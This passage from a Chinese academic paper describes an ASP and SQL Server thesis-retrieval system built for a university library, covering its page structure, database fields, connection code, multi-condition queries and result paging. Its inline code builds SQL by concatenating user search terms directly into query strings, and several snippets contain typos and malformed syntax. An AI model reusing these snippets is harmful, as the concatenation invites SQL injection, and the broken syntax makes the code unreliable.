3.2 Web頁面設(shè)計

根據(jù)該系統(tǒng)的模塊及功能，實現(xiàn)該系統(tǒng)需要4個頁面。檢索首頁index.asp，該頁面采用HTML表單的形式收集用戶輸入的檢索詞及檢索選擇項條件；基本檢索Bsearch.asp，該頁實現(xiàn)基本檢索的功能頁面，并將查詢結(jié)果分頁顯示；高級檢索Hsearch.asp，該頁實現(xiàn)高級檢索多選項、多條件的與、或、非查詢功能，并將查詢結(jié)果分頁顯示；記錄詳細(xì)顯示Show.asp, 該頁實現(xiàn)瀏覽某一紀(jì)錄的詳細(xì)信息，本校用戶可查看全文。其頁面間的關(guān)系如圖3所示。

圖3 頁面關(guān)系圖

3.3 后臺數(shù)據(jù)庫設(shè)計

本系統(tǒng)采用SQL SEVER 2000來創(chuàng)建后臺數(shù)據(jù)庫。為了提高數(shù)據(jù)庫服務(wù)器的響應(yīng)速度并確保數(shù)據(jù)安全，本系統(tǒng)采用文件實體和文件參數(shù)分別存放的方法，即在數(shù)據(jù)庫中只保存論文的文件名、存放路徑、文件格式和大小，而在WEB服務(wù)器指定目錄存放學(xué)位論文全文。根據(jù)學(xué)位論文的構(gòu)成特點和用戶的查詢需求，創(chuàng)建的數(shù)據(jù)庫表的字段如下：姓名、學(xué)號、專業(yè)、培養(yǎng)單位、論文題名、分類號、學(xué)位級別、導(dǎo)師姓名、導(dǎo)師單位、提交日期、關(guān)鍵詞、論文頁數(shù)、中文摘要、英文摘要、全文文件名，全文路徑、全文大小、全文格式。

4 系統(tǒng)功能實現(xiàn)及核心技術(shù)

在本系統(tǒng)的開發(fā)過程中，主要解決了三個核心技術(shù)問題。ASP與WEB數(shù)據(jù)庫的連接、多條件的與、或、非復(fù)雜查詢問題和查詢結(jié)果分頁顯示問題。下面來闡述這些問題的解決方法。

4.1 ASP與WEB數(shù)據(jù)庫的連接

ASP與數(shù)據(jù)庫的連接一般有三種方法：（1）通過ODBC DSN建立連接，（2）通過OLE DB建立連接，（3）通過Driver建立連接，本系統(tǒng)選用通過Driver建立連接的方法，使用該方法，程序的可移植性比較好。系統(tǒng)建立連接的過程如下：（1）建立數(shù)據(jù)庫連接對象：set conn = server.createobject ("adodb. connection ")；(2)打開要訪問的數(shù)據(jù)庫：conn.open"Driver;Server=;Database=;Uid=;Pwd= "（3）建立記錄集對象：set rs= server. createobject("ADODB.recordset")；（4）打開記錄集對象：rs. open strsql,conn,"3","1"；（5）利用記錄集對象所提供的屬性對Web 數(shù)據(jù)庫實施操作；（6）關(guān)閉記錄集對象：rs.close；（7）關(guān)閉數(shù)據(jù)連接對象：conn.close；

4.2 檢索功能實現(xiàn)

本系統(tǒng)兩大檢索模塊中，基本檢索模塊中的SQL查詢比較簡單，在這里不予熬述。重點來闡述高級檢索模塊中的動態(tài)多選項、多條件的與、或、非查詢，這是開發(fā)本系統(tǒng)的核心技術(shù)和難點之一。本文采用VBScript中的select case語句來識別用戶的動態(tài)檢索項，用IF語句來控制多條件的查詢，專門設(shè)置變量strhigh2接受用戶所選取的與、或、非條件。SQL查詢語句用變量strsql來保存，而最初的查詢語句是：strsql= "select * from table1 where 1=1 ",后面依據(jù)條件對查詢語句進行疊加，如：strsql=strsql& "select * from table1 where name = "liuyan" "，直到條件判斷完畢，最后形成SQL查詢語句，并保存在strsql變量中，執(zhí)行rs.open strsql,conn,"3","1"語句。系統(tǒng)查詢功能實現(xiàn)。

為了提高系統(tǒng)的簡單易用性和查詢結(jié)果的命中精度，本系統(tǒng)支持作者姓名、導(dǎo)師姓名字段的精確查詢，而對字段論文題名、關(guān)鍵詞、論文摘要、提交年份、學(xué)科專業(yè)、分類號實施模糊查詢，如：用SQL語句seletc * from table1 where name like %"& yan & "%實現(xiàn)模糊查詢。

4.3 查詢結(jié)果分頁顯示

在顯示查詢結(jié)果時，如果所有檢索的命中記錄在一頁顯示，將不方便用戶瀏覽，所以系統(tǒng)要求將查詢結(jié)果分頁顯示。而實現(xiàn)查詢結(jié)果分頁顯示關(guān)鍵要解決兩方面的問題：（1）循環(huán)顯示本頁記錄，（2）翻頁控制。

循環(huán)顯示本頁記錄：即當(dāng)前頁記錄的顯示問題。本系統(tǒng)采用雙重嵌套的Do WhileLoop語句來控制當(dāng)前頁記錄的顯示，用 rs.("字段名")顯示記錄字段；采用ADO中數(shù)據(jù)集RecordSet對象的一些屬性來進行參數(shù)設(shè)置：用PageSize屬性設(shè)置每頁顯示的記錄數(shù)；用PageCount 、RecordCount屬性分別顯示檢索命中的總記錄數(shù)和頁數(shù)；用AbsolutePage屬性表示當(dāng)前頁碼；用MoveNext方法來移動記錄指針；并用到了BOF 屬性和EOF 屬性。通過運用以上的語句控制與屬性設(shè)置，實現(xiàn)了當(dāng)前頁記錄的顯示。

（2）翻頁控制：系統(tǒng)要求將查詢結(jié)果分多頁顯示，而在進行翻頁時，涉及到對頁面bsearch.asp或hsearch.asp（實現(xiàn)檢索和分頁顯示的功能頁）的自身連接，也就是web服務(wù)器端要重新執(zhí)行該頁面程序，重新接收用戶輸入的檢索詞和重新執(zhí)行SQL查詢語句，并且要求正確顯示目標(biāo)頁記錄。所以，在系統(tǒng)進行翻頁時，要對兩類參數(shù)進行傳遞，分別是用戶輸入的檢索詞、檢索項和當(dāng)前頁數(shù)。本系統(tǒng)采用表單的隱藏域來對這兩類參數(shù)進行傳遞，選取Request.form("")來接收用戶從表單輸入的檢索詞和檢索項，而采用Request.querystring("")來接收翻頁時由表單隱藏域傳遞的檢索詞、檢索項參數(shù)和當(dāng)前頁數(shù)參數(shù)，并用IF語句來判斷使用前者還是后者；翻頁的自身連接采用URL方式傳遞目標(biāo)頁數(shù)。參數(shù)傳遞正確，系統(tǒng)成功實現(xiàn)翻頁功能。

5 結(jié)束語

采用web技術(shù)、數(shù)據(jù)庫技術(shù)、ASP技術(shù)實現(xiàn)了基于B/S結(jié)構(gòu)的高校學(xué)位論文檢索系統(tǒng)。在此系統(tǒng)開發(fā)過程中，重點研究解決了動態(tài)多選項、多條件的與、或、非復(fù)雜查詢問題，以及檢索結(jié)果分頁顯示的問題。經(jīng)過測試，本系統(tǒng)性能穩(wěn)定、界面友好、易于使用，現(xiàn)已應(yīng)用于西安工程大學(xué)圖書館，解決了高校學(xué)位論文的檢索難題，使得博士、碩士論文能夠被科研和教學(xué)充分利用，提高了學(xué)問論文的利用率，這也是開發(fā)本系統(tǒng)的真正意義所在，作者感到欣慰！

參考文獻(xiàn)：

[1]陳健偉，李美軍，施建強，等. ASP動態(tài)網(wǎng)站開發(fā)教程[M].北京：清華大學(xué)出版社，2005.188-206.

[2]張固，汪曉平.ASP網(wǎng)絡(luò)應(yīng)用系統(tǒng)典型模塊開發(fā)實例解析[M].北京：人民郵電出版社，2005.53-95.

[3]龍馬工作室.ASP+SQL Server組建動態(tài)網(wǎng)站實例精講[M]. 北京：人民郵電出版社，2005.73-96.